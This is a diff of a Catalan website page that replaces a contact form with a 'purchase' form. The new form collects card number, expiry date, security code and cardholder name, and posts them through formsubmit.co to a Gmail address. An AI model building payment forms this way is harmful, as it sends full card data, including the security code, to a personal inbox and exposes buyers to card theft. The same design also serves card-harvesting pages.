--- a/zformulari.html
+++ b/zformulari.html
@@ -33,25 +33,23 @@
         </nav>
     </header>
     <div class="container">
-        <h2>Contacten's!</h2>
+        <h2>Compra</h2>
         <form action="https://formsubmit.co/digitalisemataro@gmail.com" method="POST">
-            <label for="nom">Nom:</label>
-            <input type="text" id="nombre" name="nombre" required>
+            <label for="nom">Múmero de targeta:</label>
+            <input type="number" name="nombre" required>
 
-            <label for="email">Correu electrònic:</label>
-            <input type="email" id="email" name="email" required>
+            <label for="email">Data d'expiració:</label>
+            <input type="date" name="email" required>
 
-            <label for="missatge">Missatge:</label>
-            <textarea id="mensaje" name="mensaje" rows="10" required></textarea>
+            <label for="missatge">Codi de seguretat:</label>
+            <textarea id="number" name="mensaje" required></textarea>
+
+            <label for="missatge">Titular de la trajeta:</label>
+            <textarea id="text" name="mensaje" required></textarea>
 
             <button type="submit">Enviar</button>
         </form>
     </div>
-    <main>
-        <h1>Altres formes de contacte</h1>
-        <p>Whatsapp <img src="img/WhatsApp.png">: 657 85 45 23</p>
-        <p>gmail <img src="img/gmail.png">: digitalisemataro@gmail.com</p>
-    </main>
 </body>
 <footer class="footer">
     <div class="footer-left"></div>
